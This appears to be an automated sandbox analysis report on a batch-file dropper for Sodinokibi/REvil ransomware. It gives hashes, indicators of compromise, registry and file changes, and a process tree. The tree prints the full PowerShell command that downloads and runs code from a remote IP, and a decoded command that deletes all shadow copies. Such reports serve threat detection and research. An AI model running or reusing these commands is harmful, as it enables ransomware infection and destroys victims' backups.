Analysis
- max time kernel: 138s
- max time network: 53s
- platform: windows7_x64
- resource: win7v200430
- submitted: 23-06-2020 03:10
Static task: static1

Behavioral task: behavioral1
- Sample: ba14ab3ed6e7b7ab08b7add2a00958b9.bat
- Resource: win7v200430

Behavioral task: behavioral2
- Sample: ba14ab3ed6e7b7ab08b7add2a00958b9.bat
- Resource: win10
General
- Target: ba14ab3ed6e7b7ab08b7add2a00958b9.bat
- Size: 216B
- MD5: be80d5e6a14a15ec34832dbba9abf139
- SHA1: 3f56abfb2adcb556bdabeac9b92de7520a81ccbf
- SHA256: c21697f0b7e8c644cf9bc515972a1ec3b8c3c357c123dd8b06c1fa1f93e6b88b
- SHA512: 20f8041a4f2f000a47bb0f9fb7c4af1b8f4842c6706252ccc4abda665be8f7ae22b1a6d8385a19bc1d0f1e006ffb667334d127cbd70bf66a58e146b039dcd73d
Malware Config
- Extracted (second-stage download URL): http://185.103.242.78/pastes/ba14ab3ed6e7b7ab08b7add2a00958b9
- Extracted (ransom note): C:\w97n39vc9-readme.txt
  - Family: sodinokibi
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/DF2449B399E6D2ED
  - http://decryptor.cc/DF2449B399E6D2ED
Signatures

- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.

- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes:
  - pid 1480 powershell.exe

- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes:
  - pid 1480 powershell.exe (3 events)
  - pid 1376 powershell.exe (2 events)

- Enumerates connected drives (3 TTPs)

- Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer

- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
  - Set value (str): \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3u848n41.bmp"

- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes (pid -> target process):
  - PID 1312 cmd.exe wrote to memory of 1480 powershell.exe (4 events)
  - PID 1480 powershell.exe wrote to memory of 1376 powershell.exe (4 events)

- Blacklisted process makes network request (1 IoC)
  Processes:
  - flow 3, pid 1480 powershell.exe

- Drops file in Program Files directory (26 IoCs)
  Processes: powershell.exe
  - File opened for modification: \??\c:\program files\ResumeEdit.vsx
  - File opened for modification: \??\c:\program files\SwitchUpdate.midi
  - File created: \??\c:\program files\w97n39vc9-readme.txt
  - File opened for modification: \??\c:\program files\BackupCompare.eprtx
  - File opened for modification: \??\c:\program files\ConvertFromAdd.vsx
  - File opened for modification: \??\c:\program files\SearchBlock.vb
  - File opened for modification: \??\c:\program files\TraceSet.m4a
  - File opened for modification: \??\c:\program files\UnregisterComplete.xht
  - File created: \??\c:\program files (x86)\w97n39vc9-readme.txt
  - File opened for modification: \??\c:\program files\GetMove.ttf
  - File opened for modification: \??\c:\program files\ResumeSync.mp4v
  - File opened for modification: \??\c:\program files\InitializeCompare.mpeg2
  - File opened for modification: \??\c:\program files\InitializeRestart.dib
  - File opened for modification: \??\c:\program files\InitializeShow.au
  - File opened for modification: \??\c:\program files\LimitCopy.xlsb
  - File opened for modification: \??\c:\program files\MoveRedo.asp
  - File opened for modification: \??\c:\program files\DismountDebug.xltx
  - File opened for modification: \??\c:\program files\EnterRevoke.avi
  - File opened for modification: \??\c:\program files\ExportSkip.dotm
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\w97n39vc9-readme.txt
  - File opened for modification: \??\c:\program files\OptimizeEdit.svg
  - File opened for modification: \??\c:\program files\WatchResize.vstx
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\w97n39vc9-readme.txt
  - File created: \??\c:\program files\microsoft sql server compact edition\w97n39vc9-readme.txt
  - File opened for modification: \??\c:\program files\NewImport.inf
  - File opened for modification: \??\c:\program files\UnlockInstall.ods

- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes:
  - Token: SeDebugPrivilege, pid 1480 powershell.exe (2 events)
  - Token: SeDebugPrivilege, pid 1376 powershell.exe
  - Token: SeBackupPrivilege, pid 1608 vssvc.exe
  - Token: SeRestorePrivilege, pid 1608 vssvc.exe
  - Token: SeAuditPrivilege, pid 1608 vssvc.exe
  - Token: SeTakeOwnershipPrivilege, pid 1480 powershell.exe
Processes

- Level 1: C:\Windows\system32\cmd.exe (PID 1312)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\ba14ab3ed6e7b7ab08b7add2a00958b9.bat"
  Signatures:
  - Suspicious use of WriteProcessMemory

  - Level 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1480)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ba14ab3ed6e7b7ab08b7add2a00958b9');Invoke-PYHZVCNXW;Start-Sleep -s 10000"
    Signatures:
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Sets desktop wallpaper using registry
    - Suspicious use of WriteProcessMemory
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken

    - Level 3: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1376)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is base64-encoded UTF-16LE; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. deletion of all Volume Shadow Copies, which is what triggers the vssvc.exe activity below.)
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

- Level 1: C:\Windows\system32\vssvc.exe (PID 1608)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken